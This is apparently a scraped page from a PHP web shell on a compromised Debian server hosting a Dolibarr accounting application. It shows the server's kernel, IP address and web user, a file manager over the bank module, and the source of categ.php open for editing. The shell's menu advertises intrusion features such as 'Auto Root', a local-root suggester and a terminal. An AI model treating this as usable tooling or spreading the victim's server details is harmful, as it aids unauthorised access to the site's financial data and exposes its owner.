Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
bdc.bdcloud.fr /
compta /
bank /
Delete
Unzip
Name
Size
Permission
Date
Action
class
[ DIR ]
drwxr-x---
2025-11-08 11:17
various_payment
[ DIR ]
drwxr-x---
2025-11-08 11:17
account_statement_document.php
7.1
KB
-rwxr-x---
2023-04-04 15:52
annuel.php
15.09
KB
-rwxr-x---
2023-04-04 15:52
bankentries_list.php
71.69
KB
-rwxr-x---
2023-04-04 15:52
bilan.php
2.7
KB
-rwxr-x---
2023-04-04 15:52
budget.php
3.5
KB
-rwxr-x---
2023-04-04 15:52
card.php
42.77
KB
-rwxr-x---
2023-04-04 15:52
categ.php
5.39
KB
-rwxr-x---
2023-04-04 15:52
document.php
4.76
KB
-rwxr-x---
2023-04-04 15:52
graph.php
26.64
KB
-rwxr-x---
2023-04-04 15:52
info.php
2.58
KB
-rwxr-x---
2023-04-04 15:52
line.php
26.75
KB
-rwxr-x---
2023-04-04 15:52
list.php
30.65
KB
-rwxr-x---
2023-04-04 15:52
releve.php
26.63
KB
-rwxr-x---
2023-04-04 15:52
transfer.php
10.14
KB
-rwxr-x---
2023-04-04 15:52
treso.php
14.17
KB
-rwxr-x---
2023-04-04 15:52
Save
Rename
<?php /* Copyright (C) 2001-2005 Rodolphe Quiedeville <rodolphe@quiedeville.org> * Copyright (C) 2004-2013 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2005-2009 Regis Houssin <regis.houssin@inodbox.com> * Copyright (C) 2013 Charles-Fr BENKE <charles.fr@benke.fr> * Copyright (C) 2015 Jean-François Ferry <jfefe@aternatik.fr> * Copyright (C) 2016 Marcos García <marcosgdf@gmail.com> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/compta/bank/categ.php * \ingroup compta/bank * \brief Page to manage Bank Categories */ // Load Dolibarr environment require '../../main.inc.php'; require_once DOL_DOCUMENT_ROOT.'/compta/bank/class/account.class.php'; require_once DOL_DOCUMENT_ROOT.'/compta/bank/class/bankcateg.class.php'; // Load translation files required by the page $langs->loadLangs(array('banks', 'categories')); // Get Parameters $action = GETPOST('action', 'aZ09'); $optioncss = GETPOST('optioncss', 'aZ'); // Option for the css output (always '' except when 'print') $categid = GETPOST('categid'); $label = GETPOST("label"); // Initialize technical objects $bankcateg = new BankCateg($db); // Security Check Access Control if (!$user->rights->banque->configurer) { accessforbidden(); } /* * Actions */ if (GETPOST('add')) { if ($label) { $bankcateg = new BankCateg($db); $bankcateg->label = GETPOST('label'); $bankcateg->create($user); } } if ($categid) { $bankcateg = new BankCateg($db); if ($bankcateg->fetch($categid) > 0) { //Update category if (GETPOST('update') && $label) { $bankcateg->label = $label; $bankcateg->update($user); } //Delete category if ($action == 'delete') { $bankcateg->delete($user); } } } /* * View */ $title = $langs->trans('RubriquesTransactions'); $help_url = 'EN:Module_Banks_and_Cash|FR:Module_Banques_et_Caisses|ES:Módulo_Bancos_y_Cajas'; llxHeader('', $title, $help_url); print load_fiche_titre($langs->trans("RubriquesTransactions"), '', 'object_category'); print '<form method="POST" action="'.$_SERVER["PHP_SELF"].'">'; if ($optioncss != '') { print '<input type="hidden" name="optioncss" value="'.$optioncss.'">'; } print '<input type="hidden" name="token" value="'.newToken().'">'; print '<input type="hidden" name="formfilteraction" id="formfilteraction" value="list">'; print '<input type="hidden" name="action" value="list">'; /*print '<input type="hidden" name="sortfield" value="'.$sortfield.'">'; print '<input type="hidden" name="sortorder" value="'.$sortorder.'">'; print '<input type="hidden" name="page" value="'.$page.'">'; print '<input type="hidden" name="contextpage" value="'.$contextpage.'">'; */ print '<div class="div-table-responsive">'; // You can use div-table-responsive-no-min if you dont need reserved height for your table print '<table class="noborder centpercent">'; print '<tr class="liste_titre">'; print '<td>'.$langs->trans("Ref").'</td><td>'.$langs->trans("Label").'</td>'; print '<td></td>'; print '<td></td>'; print "</tr>\n"; // Line to add category if ($action != 'edit') { print '<tr class="oddeven">'; print '<td> </td><td><input name="label" type="text" class="maxwidth100"></td>'; print '<td></td>'; print '<td class="center"><input type="submit" name="add" class="button button-add small" value="'.$langs->trans("Add").'"></td>'; print '</tr>'; } $sql = "SELECT rowid, label"; $sql .= " FROM ".MAIN_DB_PREFIX."bank_categ"; $sql .= " WHERE entity = ".$conf->entity; $sql .= " ORDER BY rowid"; $result = $db->query($sql); if ($result) { $num = $db->num_rows($result); $i = 0; $total = 0; while ($i < $num) { $objp = $db->fetch_object($result); print '<tr class="oddeven">'; print '<td>'.$objp->rowid.'</td>'; if (GETPOST('action', 'aZ09') == 'edit' && GETPOST("categid") == $objp->rowid) { print '<td colspan="3">'; print '<input type="hidden" name="categid" value="'.$objp->rowid.'">'; print '<input name="label" type="text" size=45 value="'.$objp->label.'">'; print '<input type="submit" name="update" class="button" value="'.$langs->trans("Edit").'">'; print "</td>"; } else { print "<td>".$objp->label."</td>"; print '<td>'; //print '<a href="'.DOL_URL_ROOT.'/compta/bank/budget.php?bid='.$objp->rowid.'">'.$langs->trans("List").'</a>'; print '</td>'; print '<td class="center">'; print '<a class="editfielda reposition marginleftonly marginrightonly" href="'.$_SERVER["PHP_SELF"].'?categid='.$objp->rowid.'&action=edit&token='.newToken().'">'.img_edit().'</a>'; print '<a class="marginleftonly" href="'.$_SERVER["PHP_SELF"].'?categid='.$objp->rowid.'&action=delete&token='.newToken().'">'.img_delete().'</a>'; print '</td>'; } print "</tr>"; $i++; } $db->free($result); } print '</table>'; print '</div>'; print '</form>'; // End of page llxFooter(); $db->close();